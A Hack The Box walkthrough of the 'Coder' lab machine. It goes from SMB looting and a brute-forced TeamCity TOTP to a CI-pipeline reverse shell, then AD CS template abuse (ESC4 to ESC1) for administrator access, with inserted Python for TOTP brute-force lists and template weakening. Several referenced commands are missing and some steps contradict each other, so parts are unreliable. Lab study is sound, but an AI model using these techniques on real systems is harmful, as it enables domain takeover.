In this post, I would like to share a walkthrough of the Coder machine from Hack The Box.
Coder is rated as an Insane machine on Hack The Box.
What will you gain from the Coder machine?
For the user flag, you start with an SMB share that holds a .NET executable responsible for encryption together with a file it has encrypted. Reverse engineering the executable reveals a weakness that lets us decrypt the file, which yields a KeePass database and its companion key file. Using the key file to unlock the database gives us domain details, credentials and a backup of the two-factor authentication for a TeamCity server. Reverse engineering the Chrome extension shows how that backup is produced, and a brute-force attack on the backup password recovers the Time-based One-Time Password (TOTP) seed. With the seed and the credentials we log in to TeamCity and upload a modified build (a diff) that is executed as part of its Continuous Integration/Continuous Deployment (CI/CD) pipeline, giving us a shell.
For the root flag, we abuse Active Directory Certificate Services (AD CS). Our user has enough rights over a certificate template to export it with Certipy, change its msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag, and write it back, so that an enrollee can request a certificate for an arbitrary account. Requesting a certificate for the administrator and authenticating with it over Kerberos returns the administrator's NT hash, which gives us a shell with administrator privileges.
For those who want to learn or improve their cybersecurity skills, especially red teaming and blue teaming, you can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me.
The Academy link can be found at https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vv
Information Gathering on Coder Machine
Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we start information gathering on the machine with nmap -sC -sV <IP Address> -oA initial, which runs the default scripts and version detection against the 1,000 most common TCP ports and saves the output in all formats.
┌─[darknite@parrot]─[~/Document/htb/Coder]
└──╼ $nmap -sC -sV 10.10.11.207 -oA initial
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-04 07:44 EDT
Nmap scan report for 10.10.11.207
Host is up (0.16s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-04 19:04:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m47s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m48s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=default-ssl/organizationName=HTB/stateOrProvinceName=CA/countryName=US
| Not valid before: 2022-11-04T17:25:43
|_Not valid after: 2032-11-01T17:25:43
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m48s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:50+00:00; +7h18m47s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: coder.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-05-04T19:04:51+00:00; +7h18m47s from scanner time.
| ssl-cert: Subject: commonName=dc01.coder.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.coder.htb
| Not valid before: 2022-06-30T04:24:26
|_Not valid after: 2023-06-30T04:24:26
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-05-04T19:04:44
|_ start_date: N/A
|_clock-skew: mean: 7h18m47s, deviation: 0s, median: 7h18m46s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.63 seconds
Two things in this scan matter later: the host is the domain controller dc01.coder.htb (DNS, Kerberos, LDAP, SMB with signing required), and its clock is about 7h18m ahead of ours, which will break Kerberos-based authentication until we sync our time.
Let's access the website interface.
However, the website only shows the default page that indicates the server is running IIS.
SMB enumeration
Listing the shares shows a few that we can look into, but the Development share caught my attention.
There are two files stored in the Temporary Projects directory.
Let's download both files to our attacking machine.
Keepass tools
In this activity we will be using KeePassXC, which runs on Linux.
sudo apt install keepassxc
The command above installs the tool on our attacking machine.
Opening the database (with the key file recovered earlier) gives us some useful credentials that we can use to log in to the TeamCity dashboard.
So let's enter the credentials we found.
Sadly, the login then asks for a two-factor authentication code before it shows the dashboard.
Let's brute-force the 2FA code with ffuf.
After a while we get a six-digit code that validates.
Boom! At last we can see the dashboard.
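The 2FA prompt above is a six-digit TOTP. That gives an online brute force at most one million candidates, and a server that accepts neighbouring time windows and does not throttle accepts several of them per attempt, which is why the ffuf approach works. Once the seed is recovered from the extension backup, the same code can simply be generated, provided the clock offset to the server is taken into account (the nmap scan showed the DC about 7h18m ahead). The following is an added example implementing RFC 4226/6238, not code from the walkthrough or from TeamCity; the seed is the RFC 6238 reference key in base32, constructed for the example, and `wordlist()` produces the candidate list an ffuf run would use.

```python
"""TOTP (RFC 6238) generation, verification and the brute-force candidate list.

Added example, not code from the walkthrough or from TeamCity. EXAMPLE_SEED_B32
is the RFC 6238 reference key "12345678901234567890" in base32, constructed for
this example; it is not the seed recovered on the box.
"""
import base64
import hashlib
import hmac
import struct
from typing import Iterator

EXAMPLE_SEED_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"  # constructed test seed
DIGITS = 6
STEP = 30  # seconds per TOTP window


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian 64-bit counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def decode_seed(seed_b32: str) -> bytes:
    """Seeds in authenticator backups are often lower-case and unpadded; normalise."""
    seed = seed_b32.strip().replace(" ", "")
    seed += "=" * (-len(seed) % 8)
    return base64.b32decode(seed, casefold=True)


def totp(seed_b32: str, unix_time: int, skew_seconds: int = 0,
         step: int = STEP, digits: int = DIGITS) -> str:
    """Code valid at unix_time; skew_seconds shifts our clock to the server's
    (e.g. +7h18m47s as reported by the nmap clock-skew script above)."""
    counter = (unix_time + skew_seconds) // step
    return hotp(decode_seed(seed_b32), counter, digits)


def verify(seed_b32: str, code: str, unix_time: int, window: int = 1,
           skew_seconds: int = 0, step: int = STEP, digits: int = DIGITS) -> bool:
    """Server-side check accepting the current step and +/- `window` neighbours.
    Each extra accepted window is one more valid code per brute-force attempt."""
    secret = decode_seed(seed_b32)
    base = (unix_time + skew_seconds) // step
    for counter in range(base - window, base + window + 1):
        if hmac.compare_digest(hotp(secret, counter, digits), code):
            return True
    return False


def wordlist(digits: int = DIGITS) -> Iterator[str]:
    """Every zero-padded candidate (10**digits lines), one per line for ffuf -w."""
    for i in range(10 ** digits):
        yield str(i).zfill(digits)


if __name__ == "__main__":
    import time
    skew = 7 * 3600 + 18 * 60 + 47  # offset reported by nmap, assumed still accurate
    print("code for the server's clock:", totp(EXAMPLE_SEED_B32, int(time.time()), skew))
```

Without the seed, write `wordlist()` to a file and feed it to ffuf as the FUZZ value of the 2FA request; with the seed, `totp()` with the measured skew gives the code directly. The defence is on the verifier's side: lock the account or add delay after a handful of failed codes, and keep `window` small.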
We need to create a diff (patch) file containing the code shown above, which TeamCity applies and builds as part of the pipeline.
Sadly, it did not work as I planned.
After a lot of troubleshooting I found the issues and fixed the file so that it works.
Finally, it works as I planned.
Let's start our nc listener.
We should try to upload nc64.exe to the victim machine.
To serve it, let's start a Python HTTP server.
At last, the upload succeeds.
Boom! We get a reverse shell connection back to us.
We can see the file we executed in the current directory.
There are a lot of diff files that we can analyze further.
Inside them we locate some useful information, including an enc.txt and a key.key file.
The file contains the information shown above.
On Linux we can use the command above to obtain the password of a certain user.
Looking back at the diff file analyzed earlier, I noticed some usernames that we might use for escalation.
We can read the user flag with the "type user.txt" command.
Escalate to Root Privileges Access on Coder Machine
First, we need to install Certipy version 4.4.0.
Then we execute the command above to enumerate the certificate templates.
We export the template of interest to a JSON file as shown above.
Let's download the JSON file to our machine, since it is easier to modify there than on the victim.
By default, the file looks something like the one shown above.
Now we modify the key attributes: msPKI-Certificate-Name-Flag, so that the enrollee may supply the subject (and therefore the SAN), and msPKI-Enrollment-Flag, so that no manager approval is required, as shown above.
Let's upload the modified JSON file to the victim machine.
Let's execute the command shown above to write the modified configuration back to the template.
Certipy now reports the template as vulnerable: Erron Black can enroll, and because the enrollee supplies the subject, a certificate can be requested for any account in the domain.
So let's request a certificate for the administrator account, saved as a .pfx file, which we will use for privilege escalation.
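The two attribute edits above are what turn the template into the ESC1 pattern: the enrollee supplies the subject, no manager approval is required, no authorized signatures are needed, and the EKU allows client authentication. The following is an added example, not Certipy's own code, that checks a template for those four conditions and shows the same two flag changes as they would be made by someone with write access to the template object. The template is modelled as a dict keyed by LDAP attribute name (the shape of Certipy's exported JSON is an assumption), the sample template is constructed for the example, and the enrollment ACL (who holds Enroll rights, such as Erron Black here) is the fifth condition, which this example does not model.

```python
"""ESC1 assessment of an AD CS certificate template plus the walkthrough's edit
(set enrollee-supplies-subject, clear manager approval).

Added example, not Certipy's code. Template = dict keyed by LDAP attribute name;
the JSON shape is assumed and SECURE_TEMPLATE is constructed for this example.
"""
from typing import Any, Dict, List

# msPKI-Certificate-Name-Flag bit (MS-CRTD 2.26): requester supplies subject/SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit (MS-CRTD 2.27): CA manager must approve each request
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make an issued certificate usable for domain authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Constructed sample: a sensibly configured template (not the one on the box).
# LDAP returns these flags as signed 32-bit integers, hence the negative value.
SECURE_TEMPLATE: Dict[str, Any] = {
    "cn": "ExampleUser",
    "msPKI-Certificate-Name-Flag": -2113929216,  # 0x82000000: UPN from AD, DN from directory
    "msPKI-Enrollment-Flag": 42,                 # 0x2A: pend all | publish to DS | autoenroll
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
}


def as_u32(value: Any) -> int:
    """Normalise a signed LDAP integer to its unsigned 32-bit bit pattern."""
    return int(value) & 0xFFFFFFFF


def to_ldap_int(value: int) -> int:
    """Back to the signed form LDAP expects when the attribute is written."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def allows_authentication(ekus: List[str]) -> bool:
    """An empty EKU list means unrestricted use, which also permits authentication."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def assess_esc1(template: Dict[str, Any]) -> List[str]:
    """Return the ESC1 conditions the template satisfies. All four means any
    principal with Enroll rights can obtain a certificate for any user."""
    findings = []
    if as_u32(template.get("msPKI-Certificate-Name-Flag", 0)) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject (arbitrary SAN/UPN)")
    if not as_u32(template.get("msPKI-Enrollment-Flag", 0)) & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval")
    if int(template.get("msPKI-RA-Signature", 0)) == 0:
        findings.append("no authorized signatures required")
    if allows_authentication(template.get("pKIExtendedKeyUsage", [])):
        findings.append("EKU allows client authentication")
    return findings


def is_esc1_vulnerable(template: Dict[str, Any]) -> bool:
    return len(assess_esc1(template)) == 4


def weaken_template(template: Dict[str, Any]) -> Dict[str, Any]:
    """The two attribute edits from the walkthrough, as made by a principal
    with write access to the template object (the ESC4 precondition)."""
    edited = dict(template)
    edited["msPKI-Certificate-Name-Flag"] = (
        as_u32(template.get("msPKI-Certificate-Name-Flag", 0)) | CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    edited["msPKI-Enrollment-Flag"] = (
        as_u32(template.get("msPKI-Enrollment-Flag", 0)) & ~CT_FLAG_PEND_ALL_REQUESTS & 0xFFFFFFFF)
    return edited


if __name__ == "__main__":
    print("before:", assess_esc1(SECURE_TEMPLATE))
    weak = weaken_template(SECURE_TEMPLATE)
    print("after: ", assess_esc1(weak), "-> ESC1:", is_esc1_vulnerable(weak))
```

Run the assessment over every template exported from the CA, not just the one being edited; a defender reviewing the same JSON wants the reverse change (clear the subject flag, set manager approval) and, more importantly, to remove write access on the template object from ordinary users, since that is what allowed the edit here.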
Before authenticating with the certificate, we sync our clock to the DC with ntpdate; the nmap scan showed the target about 7h18m ahead of us, and Kerberos rejects requests whose timestamp is more than five minutes off (KRB_AP_ERR_SKEW).
Boom! Authenticating with the certificate over Kerberos (PKINIT) gives us the administrator's NT hash.
Finally, we access the machine with evil-winrm, passing the administrator's hash we just obtained.
We can read the root flag with the "type root.txt" command.